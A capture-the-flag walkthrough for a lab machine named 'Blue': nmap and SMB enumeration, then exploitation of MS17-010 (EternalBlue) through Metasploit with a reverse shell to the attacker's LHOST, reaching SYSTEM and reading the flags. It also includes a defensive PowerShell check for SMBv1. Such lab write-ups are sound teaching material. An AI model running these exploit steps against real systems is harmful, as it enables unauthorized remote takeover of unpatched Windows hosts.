Blue


As usual, let's start with nmap:

nmap -sV -sC 10.129.238.166

nmap tells us that port 445 is open, which is SMB, so let's use this command to list the shares available:

smbclient -L 10.129.238.166

Note: SMB authentication always requires a username. If you don't specify one, smbclient uses your VM username by default. When prompted for a password, just press enter.

We have a few shares to look into. Again, just press enter at the password prompt.

smbclient \\\\10.129.238.166\\ADMIN$
smbclient \\\\10.129.238.166\\C$

We can't access ADMIN$ and C$ (access denied without valid credentials).


Let's keep going with the other shares:

smbclient \\\\10.129.238.166\\IPC$
smbclient \\\\10.129.238.166\\Share
smbclient \\\\10.129.238.166\\Users

We were able to access the last three shares but couldn't find anything interesting there.


Now let's do another nmap scan, this time looking for known vulnerabilities on port 445 specifically, using this command:


nmap -p 445 --script vuln 10.129.238.166

-p ----> specify a port (here port 445)

--script vuln ----> run the NSE scripts in the "vuln" category, which check the target for specific known vulnerabilities


OK, so the scan reports a finding from the smb-vuln-ms17-010 script. Let's google it!

We find that MS17-010 is the Microsoft bulletin associated with the EternalBlue vulnerability!

That explains why the target machine name is Blue!


We find the following:


"EternalBlue is an exploit that allows cyber threat actors to remotely execute arbitrary code and gain access to a network by sending specially crafted packets. It exploits a software vulnerability in Microsoft’s Windows operating systems (OS) Server Message Block (SMB) version 1 (SMBv1) protocol, a network file sharing protocol that allows access to files on a remote server. This exploit potentially allows cyber threat actors to compromise the entire network and all devices connected to it. Due to EternalBlue’s ability to compromise networks, if one device is infected by malware via EternalBlue, every device connected to the network is at risk. This makes recovery difficult, as all devices on a network may have to be taken offline for remediation. This vulnerability was patched and is listed on Microsoft’s security bulletin as MS17-010."
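From the defender's side, the condition EternalBlue needs is an unpatched host with the SMBv1 server enabled. The following PowerShell check is an added example, not part of the original writeup: it reports whether SMBv1 is on and optionally turns it off. The SmbShare cmdlets exist on Windows 8 / Server 2012 and later; the LanmanServer registry value is the Windows 7 / Server 2008 R2 method, and the two KB numbers are the original March 2017 MS17-010 packages for those versions (both assumed from Microsoft's documentation, not from the page).

```powershell
# Added example: audit and (optionally) remove the SMBv1 attack surface used by MS17-010.
# Run in an elevated PowerShell session on a host you administer.
$Remediate = $false   # set to $true to disable the SMBv1 server

function Get-Smb1ServerEnabled {
    # Windows 8 / Server 2012 and later expose the setting via the SmbShare module.
    if (Get-Command Get-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        return [bool](Get-SmbServerConfiguration).EnableSMB1Protocol
    }
    # Windows 7 / Server 2008 R2: LanmanServer 'SMB1' DWORD, 0 = disabled.
    # A missing value means the default, which is enabled.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $val = (Get-ItemProperty -Path $key -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    return ($null -eq $val -or $val -ne 0)
}

function Disable-Smb1Server {
    # Disabling SMBv1 breaks clients that only speak SMBv1 (very old NAS, printers);
    # confirm nothing legitimate depends on it before applying fleet-wide.
    if (Get-Command Set-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    } else {
        $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
        Set-ItemProperty -Path $key -Name SMB1 -Type DWord -Value 0 -Force
        Write-Warning 'Restart the Server (LanmanServer) service or reboot to apply.'
    }
}

# Original MS17-010 packages for Windows 7 / Server 2008 R2 (security-only and
# monthly rollup). Later cumulative rollups supersede them, so their absence alone
# does not prove the host is unpatched; the SMBv1 state above is the reliable signal.
$ms17010Kbs = @('KB4012212', 'KB4012215')
$found = Get-HotFix | Where-Object { $ms17010Kbs -contains $_.HotFixID }

if (Get-Smb1ServerEnabled) {
    Write-Host 'SMBv1 server ENABLED: EternalBlue attack surface present'
    if ($Remediate) { Disable-Smb1Server; Write-Host 'SMBv1 server disabled' }
} else {
    Write-Host 'SMBv1 server disabled'
}
if ($found) { Write-Host ("MS17-010 package(s) installed: " + ($found.HotFixID -join ', ')) }
else { Write-Host 'Original MS17-010 packages not listed; check the cumulative update level' }
```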

Now let's look for an exploit.


Let's open Metasploit:

msfconsole

Once Metasploit has opened, let's search for any module whose name contains the word "blue" by typing:

search blue

Let's check number 13, exploit/windows/smb/ms17_010_eternalblue (the index number may differ depending on your Metasploit version):


use exploit/windows/smb/ms17_010_eternalblue

show options

Looks like we only need to set RHOSTS (the remote host) and LHOST (our local host); RPORT is already set to 445 and LPORT to 4444 by default.


set RHOSTS 10.129.238.166

Type the IP of the target machine

set LHOST 10.10.14.10

Type the IP of your local machine (if you don't know your IP, open a new terminal and type ifconfig).


Now that it's all set up, let's run the exploit:

exploit

It worked!


Now we can type:

shell

Let's find out the level of privileges we got:

whoami

OK, we are NT AUTHORITY\SYSTEM, so we have unrestricted privileges on the machine.


Let's change directory to find the users:

cd C:\Users

And now let's list the folders in this directory by typing:

dir

Looks like one of the users is haris. The user flag is usually located on the user's Desktop, so let's do:

cd haris/Desktop

then

dir

type user.txt

Congratulations! You got the user flag!


Now let's go get the root flag. The root flag is usually located at C:\Users\Administrator\Desktop, so:

cd C:\Users\Administrator\Desktop

dir

type root.txt

Congratulations! You got the root flag!
